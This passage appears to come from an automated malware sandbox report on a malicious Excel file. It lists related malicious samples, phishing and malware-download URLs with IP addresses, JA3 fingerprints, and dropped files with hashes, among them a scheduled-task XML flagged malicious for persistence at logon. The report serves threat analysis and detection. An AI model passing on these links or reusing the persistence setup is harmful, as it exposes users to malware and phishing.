                                                          50404868-c352-422f-a608-7fd64b335eec.exeGet hashmaliciousBrowse
                                                          • 185.157.161.86
                                                          DHL_file 187652345643476245.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
                                                          FedExs AWB#5305323204643.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
                                                          URGENT QUOTATION 473833057.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
                                                          P-O Doc #6620200947535257653.exeGet hashmaliciousBrowse
                                                          • 185.157.160.233
                                                          SecuriteInfo.com.Trojan.DownLoader36.26524.23979.exeGet hashmaliciousBrowse
                                                          • 185.157.160.202
                                                          https://cdn-102.anonfiles.com/74S7h0zcpf/89a5d721-1608220696/Red%20Engine%20Cracked.zipGet hashmaliciousBrowse
                                                          • 217.64.149.161
                                                          74725794.pdf.exeGet hashmaliciousBrowse
                                                          • 185.157.161.86
                                                          zlkcd7HSQp.exeGet hashmaliciousBrowse
                                                          • 185.157.162.81
                                                          machine.xlsGet hashmaliciousBrowse
                                                          • 185.157.162.81
                                                          Order_List_PO# 0819289.exeGet hashmaliciousBrowse
                                                          • 185.157.161.86
                                                          qdnLoWn1E8.exeGet hashmaliciousBrowse
                                                          • 185.157.162.81
                                                          CLOUDFLARENETUSbank Acct Numbr-pdf.exeGet hashmaliciousBrowse
                                                          • 104.28.4.151
                                                          mASBqbWDup.exeGet hashmaliciousBrowse
                                                          • 1.1.1.1
                                                          https://veringer.com/wp-includes/wwii11/GXQb6HLGz4AV965RfN9795cyETWfmdzBUarzFg4YkqaJnfdTD/Get hashmaliciousBrowse
                                                          • 104.16.94.65
                                                          order (2021.01.05).exeGet hashmaliciousBrowse
                                                          • 104.24.107.188
                                                          https://micrrosoftonline13392123112a.typeform.com/to/y7uCHr2NGet hashmaliciousBrowse
                                                          • 104.20.185.68
                                                          https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/?utm_source=redcanary&utm_medium=email&utm_campaign=Blog%20Digest-2020-11-05T09:00:54.888-07:00&mkt_tok=eyJpIjoiWmpKbVlUTXpPRGMzTTJRMSIsInQiOiJtMm9iYWJESHd5VldFUTF2a05zeEdtVUdMNms3cHVcL01OcW9hYUlwOElYZFwvNkdvd0UzV0x2SDdNZVlIMWFTSG1jS28zM0JIamh3YXRvcmU0K2htaTJpTlFLbjNNaWswT2NxYlhXdElEZHVzMlFaclpoTUFzZk1ibTV0SGVwSCs2In0%3DGet hashmaliciousBrowse
                                                          • 104.17.71.206
                                                          https://xcampers.no/Access/preview/secure/microsoft/Get hashmaliciousBrowse
                                                          • 104.16.18.94
                                                          __.htmGet hashmaliciousBrowse
                                                          • 104.16.19.94
                                                          https://needaboatmoved.com/01-04-2021.htmlGet hashmaliciousBrowse
                                                          • 104.16.18.94
                                                          #U260e#Ufe0f.htmGet hashmaliciousBrowse
                                                          • 104.16.19.94
                                                          #U260e#Ufe0f.htmGet hashmaliciousBrowse
                                                          • 104.16.19.94
                                                          https://patrickphimr5.github.io/memoaideivozx/dsfriet.html?bbre=dxcfdgoissGet hashmaliciousBrowse
                                                          • 104.28.12.251
                                                          1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                          • 172.67.167.122
                                                          output.xlsGet hashmaliciousBrowse
                                                          • 104.20.139.65
                                                          Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                                                          • 172.67.144.71
                                                          output.xlsGet hashmaliciousBrowse
                                                          • 104.20.138.65
                                                          output.xlsGet hashmaliciousBrowse
                                                          • 172.67.1.225
                                                          output.xlsGet hashmaliciousBrowse
                                                          • 104.20.138.65
                                                          UaTCQiQ6XK.exeGet hashmaliciousBrowse
                                                          • 162.159.135.232
                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 104.22.1.232

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          05af1f5ca1b87cc9cc9b25185115607d1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          output.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          output.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          Shipping Details DHL.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          AdviceSlip.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          PI 99-14.doc__.rtfGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          Archivo.docGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          QUOTATION FP-240018.docGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          QUOTATION FP-240018.docGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          MDYL rj0810666.docGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          Export Order Vene.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          info-122020-40367.docGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          Invoice S2517158.docGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          RQ-10375.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          RQ-10375.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232
                                                          AIRWAY-BILLDELIVERY.xlsGet hashmaliciousBrowse
                                                          • 104.22.0.232

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                          Category:dropped
                                                          Size (bytes):58936
                                                          Entropy (8bit):7.994797855729196
                                                          Encrypted:true
                                                          SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                          MD5:E4F1E21910443409E81E5B55DC8DE774
                                                          SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                          SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                          SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                          Malicious:false
                                                          Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):326
                                                          Entropy (8bit):3.123186963792904
                                                          Encrypted:false
                                                          SSDEEP:6:kKMMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:kMdkPlE99SNxAhUegeT2
                                                          MD5:4B253AB84A067EFA601E08DC32AE23A8
                                                          SHA1:64BA6477BA7D8FC39DD599B7372F07557A589FB1
                                                          SHA-256:A343C71A688FFFFDBB9A85005324D734D3CADF30AC036A8C1F53C90F994C09F9
                                                          SHA-512:990137327ED42082D80B6FE0B24C8C4B9F0CB3571EDF4080855925C89CF8AE62E537622C05F208618D84809E9B2526799399BB468516A2E3493731F221096345
                                                          Malicious:false
                                                          Preview: p...... ................(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                          C:\Users\user\AppData\Local\Temp\A5EE0000
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):218510
                                                          Entropy (8bit):7.934860707644141
                                                          Encrypted:false
                                                          SSDEEP:6144:nrqIUBvQUkM6fWRFTcf35skaMNVMTV5GcQgXYr1w:nP6vQVpfWvTG5kS6T3JX9
                                                          MD5:9904713510D253B3F2F01F012BCFDEF8
                                                          SHA1:222C0A56770F3AB8C59387DA9D5FD17B4D6A74A0
                                                          SHA-256:728C00ECA6E33D81736B8E0336963CFC299B0CA4362FF99FCBADB3F0C4C616DF
                                                          SHA-512:D6C597C7BFE8099822215AB6905D72FBAD3C956A9EED74A743036FB5B0A53E46327CCA6F8ED58184ABEBC7C0AD3640937BF57C2B8B6F89988BCFA2EB71DBFBA7
                                                          Malicious:false
                                                          Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\Cab41F0.tmp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                          Category:dropped
                                                          Size (bytes):58936
                                                          Entropy (8bit):7.994797855729196
                                                          Encrypted:true
                                                          SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                          MD5:E4F1E21910443409E81E5B55DC8DE774
                                                          SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                          SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                          SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                          Malicious:false
                                                          Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                          C:\Users\user\AppData\Local\Temp\Tar41F1.tmp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):152533
                                                          Entropy (8bit):6.31602258454967
                                                          Encrypted:false
                                                          SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                          MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                          SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                          SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                          SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                          Malicious:false
                                                          Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                          C:\Users\user\AppData\Local\Temp\tmp8C58.tmp
                                                          Process:C:\Users\user\AppData\Roaming\sb.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1624
                                                          Entropy (8bit):5.147486668538602
                                                          Encrypted:false
                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBJtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3x
                                                          MD5:381406DD05BEE1CE60411F8DBD5F46E3
                                                          SHA1:3A2FDD7A6CC740AB90B6FC54D0539C377FBCDAF7
                                                          SHA-256:0CCE73DE36BA35D93C8A0F3A0AFB95C55D81043F399D19513309DB67132EC6A1
                                                          SHA-512:95C445B5188B90E24545DBF3FC71A90B4B160A41E7E951576CF1DFC4138782188A8958078555C8812EDB33AFDDE603414E68D83F13C558078D26564E951EE9E0
                                                          Malicious:true
                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 5 17:06:44 2021, atime=Tue Jan 5 17:06:44 2021, length=12288, window=hide
                                                          Category:dropped
                                                          Size (bytes):867
                                                          Entropy (8bit):4.48538863395965
                                                          Encrypted:false
                                                          SSDEEP:12:85Q00LgXg/XAlCPCHaXtB8XzB/B6RvX+WnicvbwbDtZ3YilMMEpxRljK6TdJP9TK:85w/XTd6joYegDv3qfrNru/
                                                          MD5:BA7A333A3867690B9D518625085D6650
                                                          SHA1:8CA687D16DF545CAC98A659C2A627D9ED8DEB98F
                                                          SHA-256:CBD2F4B2335F4706775E3F9A3DC8082EBF25E6C8AA2BACF9A62CB1359E6BCE80
                                                          SHA-512:9E1B0BEE2801393F0057AECE8CA307CC09008A3590586B54F2DA5F4A8FD67173963032E9FAA8D446711B5E81156E23DF2C6B5CE1714237A4D1851F7BD8520338
                                                          Malicious:false
                                                          Preview: L..................F...........7G..u......u.......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....%R...Desktop.d......QK.X%R.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):98
                                                          Entropy (8bit):4.29593984928515
                                                          Encrypted:false
                                                          SSDEEP:3:oyBVomMF3zd8CO8zd8CmMF3zd8Cv:dj6F3Z8sZ8UF3Z8s
                                                          MD5:121AA7B0E15C0A2FAF081C912D00A1CF
                                                          SHA1:DA137B4B637D550C95187F23D8860A85B5A7CB86
                                                          SHA-256:7187575715B0E3C58A5A71F3A35094E3715F2A84B60565020E5B1C6AA2DD6832
                                                          SHA-512:8AE109F6E0B7C2BB853DEE3016B72628F43950664FA6991E22C29BE24BE25B5A0777420490EED644BC6F9847323C4CFD24FF80578BB59FD8C836672FC13F063F
                                                          Malicious:false
                                                          Preview: Desktop.LNK=0..[xls]..spetsifikatsiya.LNK=0..spetsifikatsiya.LNK=0..[xls]..spetsifikatsiya.LNK=0..
                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\spetsifikatsiya.LNK
                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Tue Jan 5 17:06:44 2021, atime=Tue Jan 5 17:06:44 2021, length=242176, window=hide
                                                          Category:dropped
                                                          Size (bytes):2078
                                                          Entropy (8bit):4.545541836017036
                                                          Encrypted:false
                                                          SSDEEP:48:83n/XT0jF495JT2fQh23n/XT0jF495JT2fQ/:8X/XojF495Z2fQh2X/XojF495Z2fQ/
                                                          MD5:EF223B7B327E3789182050A2602E83D4
                                                          SHA1:B46D2CF3819BA372AC0DB7354521B3393907DF73
                                                          SHA-256:937ADE0977735AF43997DB9BBC095D45170E5768128937CC0F7D760DBE3360C2
                                                          SHA-512:935D70429911A79AB9492F5930F0752AEAE83FC732A6A9AFB44377810AEBBEBA8386F96013EF7DFEAA1B1B0AFC33F516AEE45B0A71A2CDED929CFE9AB61134DA
                                                          Malicious:false
                                                          Preview: L..................F.... ...f5...{..u.........................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....%R. .SPETSI~1.XLS..T.......Q.y.Q.y*...8.....................s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.......}...............-...8...[............?J......C:\Users\..#...................\\688098\Users.user\Desktop\spetsifikatsiya.xls.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.s.p.e.t.s.i.f.i.k.a.t.s.i.y.a...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......688098..........D_....3N...W...9F.C.........
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0BGTGBBF7Q6SKHN9BKYX.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.5877382331325665
                                                          Encrypted:false
                                                          SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
                                                          MD5:88AF443197F04FC07F6BE051B7084403
                                                          SHA1:AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
                                                          SHA-256:24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
                                                          SHA-512:D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2YWU3VZ5KQ7YGZJ3GJV8.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.5877382331325665
                                                          Encrypted:false
                                                          SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
                                                          MD5:88AF443197F04FC07F6BE051B7084403
                                                          SHA1:AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
                                                          SHA-256:24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
                                                          SHA-512:D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PUV6Q5QUWPCDRN1NU16Z.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.5877382331325665
                                                          Encrypted:false
                                                          SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCwor/zkKYyHyf8R8lUVbIu:cywo1z8yMHnor/zkRf8RDIu
                                                          MD5:88AF443197F04FC07F6BE051B7084403
                                                          SHA1:AFAD4C89B8CA751992F0C636B23DD4EA2E08D3B9
                                                          SHA-256:24E7ED8A16E78FD8367F86C9DA45FD5456CC2313DB87C7585526D47C3552E3E8
                                                          SHA-512:D7E76297B4ED2A53C288D3AF7928C9EF03FFC2ABCD868DFF34CB69622E4F3EA0491B327027FEE7C4B9C6FB92A34560A2AE86154B69E12DE9149E0576FE1E1F2A
                                                          Malicious:false
                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QWQLK7LNYAZINNN1XM4E.temp
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.5877382331325665
                                                          Encrypted:false
